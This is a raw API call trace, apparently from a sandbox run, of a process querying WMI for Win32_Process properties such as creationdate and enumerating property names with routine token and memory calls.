[0401.609] IWbemClassObject:Get (in: This=0x338df0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.609] free (_Block=0x209680)
[0401.609] malloc (_Size=0x18) returned 0x209680
[0401.609] IWbemClassObject:Get (in: This=0x338df0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.609] free (_Block=0x209680)
[0401.610] malloc (_Size=0x18) returned 0x209680
[0401.610] lstrlenW (lpString="Status") returned 6
[0401.610] lstrlenW (lpString="creationdate") returned 12
[0401.610] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Status", cchCount2=6) returned 1
[0401.610] free (_Block=0x209680)
[0401.610] IUnknown:Release (This=0x338df0) returned 0x1
[0401.610] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.610] malloc (_Size=0x18) returned 0x209680
[0401.610] IWbemClassObject:Get (in: This=0x3390a0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.610] free (_Block=0x209680)
[0401.610] malloc (_Size=0x18) returned 0x209680
[0401.610] IWbemClassObject:Get (in: This=0x3390a0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.611] free (_Block=0x209680)
[0401.611] malloc (_Size=0x18) returned 0x209680
[0401.611] lstrlenW (lpString="TerminationDate") returned 15
[0401.611] lstrlenW (lpString="creationdate") returned 12
[0401.611] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="TerminationDate", cchCount2=15) returned 1
[0401.611] free (_Block=0x209680)
[0401.611] IUnknown:Release (This=0x3390a0) returned 0x1
[0401.611] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.611] malloc (_Size=0x18) returned 0x209680
[0401.611] IWbemClassObject:Get (in: This=0x339350, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.611] free (_Block=0x209680)
[0401.611] malloc (_Size=0x18) returned 0x209680
[0401.611] IWbemClassObject:Get (in: This=0x339350, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.612] free (_Block=0x209680)
[0401.612] malloc (_Size=0x18) returned 0x209680
[0401.612] lstrlenW (lpString="ThreadCount") returned 11
[0401.612] lstrlenW (lpString="creationdate") returned 12
[0401.612] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ThreadCount", cchCount2=11) returned 1
[0401.612] free (_Block=0x209680)
[0401.612] IUnknown:Release (This=0x339350) returned 0x1
[0401.612] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.612] malloc (_Size=0x18) returned 0x209680
[0401.612] IWbemClassObject:Get (in: This=0x339600, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.612] free (_Block=0x209680)
[0401.612] malloc (_Size=0x18) returned 0x209680
[0401.613] IWbemClassObject:Get (in: This=0x339600, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.613] free (_Block=0x209680)
[0401.613] malloc (_Size=0x18) returned 0x209680
[0401.613] lstrlenW (lpString="UserModeTime") returned 12
[0401.613] lstrlenW (lpString="creationdate") returned 12
[0401.613] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="UserModeTime", cchCount2=12) returned 1
[0401.613] free (_Block=0x209680)
[0401.613] IUnknown:Release (This=0x339600) returned 0x1
[0401.613] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.613] malloc (_Size=0x18) returned 0x209680
[0401.613] IWbemClassObject:Get (in: This=0x3398b0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.614] free (_Block=0x209680)
[0401.614] malloc (_Size=0x18) returned 0x209680
[0401.614] IWbemClassObject:Get (in: This=0x3398b0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.614] free (_Block=0x209680)
[0401.614] malloc (_Size=0x18) returned 0x209680
[0401.614] lstrlenW (lpString="VirtualSize") returned 11
[0401.614] lstrlenW (lpString="creationdate") returned 12
[0401.614] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="VirtualSize", cchCount2=11) returned 1
[0401.614] free (_Block=0x209680)
[0401.614] IUnknown:Release (This=0x3398b0) returned 0x1
[0401.614] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.614] malloc (_Size=0x18) returned 0x209680
[0401.615] IWbemClassObject:Get (in: This=0x339b60, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.615] free (_Block=0x209680)
[0401.615] malloc (_Size=0x18) returned 0x209680
[0401.615] IWbemClassObject:Get (in: This=0x339b60, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.615] free (_Block=0x209680)
[0401.615] malloc (_Size=0x18) returned 0x209680
[0401.615] lstrlenW (lpString="WindowsVersion") returned 14
[0401.615] lstrlenW (lpString="creationdate") returned 12
[0401.615] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WindowsVersion", cchCount2=14) returned 1
[0401.615] free (_Block=0x209680)
[0401.615] IUnknown:Release (This=0x339b60) returned 0x1
[0401.616] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.616] malloc (_Size=0x18) returned 0x209680
[0401.616] IWbemClassObject:Get (in: This=0x339e10, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.616] free (_Block=0x209680)
[0401.616] malloc (_Size=0x18) returned 0x209680
[0401.616] IWbemClassObject:Get (in: This=0x339e10, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.616] free (_Block=0x209680)
[0401.616] malloc (_Size=0x18) returned 0x209680
[0401.616] lstrlenW (lpString="WorkingSetSize") returned 14
[0401.616] lstrlenW (lpString="creationdate") returned 12
[0401.616] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WorkingSetSize", cchCount2=14) returned 1
[0401.617] free (_Block=0x209680)
[0401.617] IUnknown:Release (This=0x339e10) returned 0x1
[0401.617] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.617] malloc (_Size=0x18) returned 0x209680
[0401.617] IWbemClassObject:Get (in: This=0x33a0c0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.617] free (_Block=0x209680)
[0401.617] malloc (_Size=0x18) returned 0x209680
[0401.617] IWbemClassObject:Get (in: This=0x33a0c0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.617] free (_Block=0x209680)
[0401.617] malloc (_Size=0x18) returned 0x209680
[0401.617] lstrlenW (lpString="WriteOperationCount") returned 19
[0401.617] lstrlenW (lpString="creationdate") returned 12
[0401.617] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WriteOperationCount", cchCount2=19) returned 1
[0401.618] free (_Block=0x209680)
[0401.618] IUnknown:Release (This=0x33a0c0) returned 0x1
[0401.618] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.618] malloc (_Size=0x18) returned 0x209680
[0401.618] IWbemClassObject:Get (in: This=0x33a370, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WriteTransferCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.618] free (_Block=0x209680)
[0401.619] malloc (_Size=0x18) returned 0x209680
[0401.620] IWbemClassObject:Get (in: This=0x33a370, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WriteTransferCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.620] free (_Block=0x209680)
[0401.620] malloc (_Size=0x18) returned 0x209680
[0401.620] lstrlenW (lpString="WriteTransferCount") returned 18
[0401.620] lstrlenW (lpString="creationdate") returned 12
[0401.620] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WriteTransferCount", cchCount2=18) returned 1
[0401.620] free (_Block=0x209680)
[0401.620] IUnknown:Release (This=0x33a370) returned 0x1
[0401.620] IUnknown:Release (This=0x2c96a0) returned 0x1
[0401.624] IUnknown:Release (This=0x2c8c70) returned 0x0
[0401.624] free (_Block=0x209660)
[0401.624] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.624] free (_Block=0x20ce80)
[0401.624] malloc (_Size=0x70) returned 0x20ce80
[0401.624] malloc (_Size=0x8) returned 0x20cf00
[0401.624] malloc (_Size=0x18) returned 0x209660
[0401.625] SysStringLen (param_1="creationdate") returned 0xc
[0401.625] malloc (_Size=0x1a) returned 0x20cf20
[0401.625] SysStringLen (param_1="creationdate") returned 0xc
[0401.625] malloc (_Size=0x8) returned 0x20cf50
[0401.625] free (_Block=0x209660)
[0401.625] free (_Block=0x20ce30)
[0401.625] lstrlenW (lpString="creationdate") returned 12
[0401.625] malloc (_Size=0x1a) returned 0x20ce30
[0401.625] lstrlenW (lpString="creationdate") returned 12
[0401.625] free (_Block=0x20cf20)
[0401.625] free (_Block=0x20cf50)
[0401.625] free (_Block=0x20cf00)
[0401.626] free (_Block=0x20ce80)
[0401.626] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0401.626] malloc (_Size=0x38) returned 0x2086c0
[0401.626] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0401.626] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select"
[0401.626] malloc (_Size=0x18) returned 0x209660
[0401.626] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*"
[0401.626] lstrlenW (lpString="FROM") returned 4
[0401.626] lstrlenW (lpString="*") returned 1
[0401.626] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
[0401.626] malloc (_Size=0x18) returned 0x209680
[0401.626] free (_Block=0x209660)
[0401.627] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2000fe006e0009 | out: _String=0x0, _Context=0x2000fe006e0009) returned="from"
[0401.627] lstrlenW (lpString="FROM") returned 4
[0401.627] lstrlenW (lpString="from") returned 4
[0401.627] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
[0401.627] malloc (_Size=0x18) returned 0x209660
[0401.627] free (_Block=0x209680)
[0401.627] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2000ff006e0009 | out: _String=0x0, _Context=0x2000ff006e0009) returned="Win32_Process"
[0401.627] malloc (_Size=0x18) returned 0x209680
[0401.627] free (_Block=0x209660)
[0401.627] free (_Block=0x2086c0)
[0401.627] free (_Block=0x209680)
[0401.627] lstrlenW (lpString="SET") returned 3
[0401.628] lstrlenW (lpString="get") returned 3
[0401.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
[0401.628] lstrlenW (lpString="CREATE") returned 6
[0401.628] lstrlenW (lpString="get") returned 3
[0401.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="CREATE", cchCount2=6) returned 3
[0401.628] free (_Block=0x20cce0)
[0401.628] malloc (_Size=0x8) returned 0x20cce0
[0401.628] lstrlenW (lpString="GET") returned 3
[0401.628] lstrlenW (lpString="get") returned 3
[0401.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0401.628] free (_Block=0x2095a0)
[0401.628] malloc (_Size=0x18) returned 0x2095a0
[0401.629] free (_Block=0x209580)
[0401.629] malloc (_Size=0x18) returned 0x209580
[0401.629] ??0CHString@@QEAA@XZ () returned 0x16f788
[0401.629] malloc (_Size=0x18) returned 0x209680
[0401.629] malloc (_Size=0x20) returned 0x20ce80
[0401.629] memcpy_s (in: _Destination=0x20ce80, _DestinationSize=0x1e, _Source=0x2e4c58, _SourceSize=0x14 | out: _Destination=0x20ce80) returned 0x0
[0401.629] lstrlenW (lpString="&") returned 1
[0401.629] lstrlenW (lpString="&amp;") returned 5
[0401.629] lstrlenW (lpString="<") returned 1
[0401.629] lstrlenW (lpString="&lt;") returned 4
[0401.629] lstrlenW (lpString=">") returned 1
[0401.630] lstrlenW (lpString="&gt;") returned 4
[0401.630] lstrlenW (lpString="'") returned 1
[0401.630] lstrlenW (lpString="&apos;") returned 6
[0401.630] lstrlenW (lpString="\"") returned 1
[0401.630] lstrlenW (lpString="&quot;") returned 6
[0401.630] malloc (_Size=0x18) returned 0x209660
[0401.630] free (_Block=0x209680)
[0401.630] free (_Block=0x20ce80)
[0401.630] ?Format@CHString@@QEAAXPEBGZZ () returned 0x20ce8c
[0401.631] malloc (_Size=0x18) returned 0x209680
[0401.631] malloc (_Size=0x18) returned 0x2096c0
[0401.631] SysStringLen (param_1="") returned 0x0
[0401.631] SysStringLen (param_1="") returned 0x1b
[0401.631] memcpy (in: _Dst=0x2c62c8, _Src=0x2bf748, _Size=0x2 | out: _Dst=0x2c62c8) returned 0x2c62c8
[0401.631] memcpy (in: _Dst=0x2c62c8, _Src=0x2c6228, _Size=0x38 | out: _Dst=0x2c62c8) returned 0x2c62c8
[0401.631] free (_Block=0x209580)
[0401.631] free (_Block=0x209680)
[0401.631] free (_Block=0x209660)
[0401.631] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0401.631] WbemLocator:IUnknown:AddRef (This=0x26cc20) returned 0x3
[0401.631] free (_Block=0x207fa0)
[0401.632] lstrlenW (lpString="") returned 0
[0401.632] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0401.632] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="", cchCount2=0) returned 3
[0401.632] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0401.632] malloc (_Size=0x16) returned 0x209660
[0401.632] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0401.632] GetCurrentThreadId () returned 0xdf0
[0401.632] GetCurrentProcess () returned 0xffffffffffffffff
[0401.632] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16f600 | out: TokenHandle=0x16f600*=0x268) returned 1
[0401.632] GetTokenInformation (in: TokenHandle=0x268, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f5f8 | out: TokenInformation=0x0, ReturnLength=0x16f5f8) returned 0
[0401.632] malloc (_Size=0x40) returned 0x20ce80
[0401.632] GetTokenInformation (in: TokenHandle=0x268, TokenInformationClass=0x3, TokenInformation=0x20ce80, TokenInformationLength=0x40, ReturnLength=0x16f5f8 | out: TokenInformation=0x20ce80, ReturnLength=0x16f5f8) returned 1
[0401.632] AdjustTokenPrivileges (in: TokenHandle=0x268, DisableAllPrivileges=0, NewState=0x20ce80*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x64006e, Luid.HighPart=1190786062, Attributes=0x9852))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0401.633] free (_Block=0x20ce80)
[0401.633] CloseHandle (hObject=0x268) returned 1
[0401.633] lstrlenW (lpString="GET") returned 3
[0401.633] lstrlenW (lpString="get") returned 3
[0401.633] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0401.633] malloc (_Size=0x18) returned 0x209680
[0401.633] lstrlenA (lpString="") returned 0
[0401.633] malloc (_Size=0x2) returned 0x207fa0
[0401.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x207fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0401.634] free (_Block=0x207fa0)
[0401.634] malloc (_Size=0x18) returned 0x209580
[0401.634] lstrlenA (lpString="") returned 0
[0401.634] malloc (_Size=0x2) returned 0x207fa0
[0401.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x207fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0401.634] free (_Block=0x207fa0)
[0401.634] malloc (_Size=0x18) returned 0x209640
[0401.634] lstrlenA (lpString="") returned 0
[0401.634] malloc (_Size=0x2) returned 0x207fa0
[0401.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x207fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0401.634] free (_Block=0x207fa0)
[0401.635] malloc (_Size=0x18) returned 0x209760
[0401.635] lstrlenA (lpString="") returned 0
[0401.635] malloc (_Size=0x2) returned 0x207fa0
[0401.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x207fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0401.635] free (_Block=0x207fa0)
[0401.635] malloc (_Size=0x18) returned 0x2096e0
[0401.635] malloc (_Size=0x18) returned 0x209700
[0401.635] SysStringLen (param_1="") returned 0x0
[0401.635] SysStringLen (param_1="creationdate") returned 0xc
[0401.635] memcpy (in: _Dst=0x2e9478, _Src=0x2e4c58, _Size=0x2 | out: _Dst=0x2e9478) returned 0x2e9478
[0401.635] memcpy (in: _Dst=0x2e9478, _Src=0x2c6228, _Size=0x1a | out: _Dst=0x2e9478) returned 0x2e9478
[0401.635] free (_Block=0x209680)
[0401.636] free (_Block=0x2096e0)
[0401.636] lstrlenW (lpString="__CLASS") returned 7
[0401.636] lstrlenW (lpString="creationdate") returned 12
[0401.636] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__CLASS", cchCount2=7) returned 3
[0401.636] lstrlenW (lpString="__DERIVATION") returned 12
[0401.636] lstrlenW (lpString="creationdate") returned 12
[0401.636] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__DERIVATION", cchCount2=12) returned 3
[0401.636] lstrlenW (lpString="__DYNASTY") returned 9
[0401.636] lstrlenW (lpString="creationdate") returned 12
[0401.636] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__DYNASTY", cchCount2=9) returned 3
[0401.636] lstrlenW (lpString="__GENUS") returned 7
[0401.636] lstrlenW (lpString="creationdate") returned 12
[0401.636] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__GENUS", cchCount2=7) returned 3
[0401.636] lstrlenW (lpString="__NAMESPACE") returned 11
[0401.636] lstrlenW (lpString="creationdate") returned 12
[0401.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__NAMESPACE", cchCount2=11) returned 3
[0401.637] lstrlenW (lpString="__PATH") returned 6
[0401.637] lstrlenW (lpString="creationdate") returned 12
[0401.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__PATH", cchCount2=6) returned 3
[0401.637] lstrlenW (lpString="__PROPERTYCOUNT") returned 15
[0401.637] lstrlenW (lpString="creationdate") returned 12
[0401.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__PROPERTYCOUNT", cchCount2=15) returned 3
[0401.637] lstrlenW (lpString="__RELPATH") returned 9
[0401.637] lstrlenW (lpString="creationdate") returned 12
[0401.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__RELPATH", cchCount2=9) returned 3
[0401.637] lstrlenW (lpString="__SERVER") returned 8
[0401.637] lstrlenW (lpString="creationdate") returned 12
[0401.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__SERVER", cchCount2=8) returned 3
[0401.637] lstrlenW (lpString="__SUPERCLASS") returned 12
[0401.637] lstrlenW (lpString="creationdate") returned 12
[0401.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__SUPERCLASS", cchCount2=12) returned 3
[0401.637] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0401.638] malloc (_Size=0x38) returned 0x2086c0
[0401.638] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0401.638] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select"
[0401.638] malloc (_Size=0x18) returned 0x2096e0
[0401.638] free (_Block=0x209580)
[0401.638] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x20010a006a0005 | out: _String=0x0, _Context=0x20010a006a0005) returned="*"
[0401.638] lstrlenW (lpString="FROM") returned 4
[0401.638] lstrlenW (lpString="*") returned 1
[0401.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
[0401.638] malloc (_Size=0x18) returned 0x209580
[0401.638] free (_Block=0x2096e0)
[0401.638] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x20010b006a0005 | out: _String=0x0, _Context=0x20010b006a0005) returned="from"
[0401.639] lstrlenW (lpString="FROM") returned 4
[0401.639] lstrlenW (lpString="from") returned 4
[0401.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
[0401.639] malloc (_Size=0x18) returned 0x2096e0
[0401.639] free (_Block=0x209580)
[0401.639] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x20010c006a0005 | out: _String=0x0, _Context=0x20010c006a0005) returned="Win32_Process"
[0401.639] malloc (_Size=0x18) returned 0x209580
[0401.639] free (_Block=0x2096e0)
[0401.639] free (_Block=0x2086c0)
[0401.639] malloc (_Size=0x18) returned 0x2096e0
[0401.639] lstrlenA (lpString=" FROM ") returned 6
[0401.639] malloc (_Size=0xe) returned 0x209680
[0401.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" FROM ", cbMultiByte=-1, lpWideCharStr=0x209680, cchWideChar=7 | out: lpWideCharStr=" FROM ") returned 7
[0401.640] free (_Block=0x209680)
[0401.640] malloc (_Size=0x18) returned 0x209680
[0401.640] lstrlenA (lpString="SELECT ") returned 7
[0401.640] malloc (_Size=0x10) returned 0x209720
[0401.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="SELECT ", cbMultiByte=-1, lpWideCharStr=0x209720, cchWideChar=8 | out: lpWideCharStr="SELECT ") returned 8
[0401.640] free (_Block=0x209720)
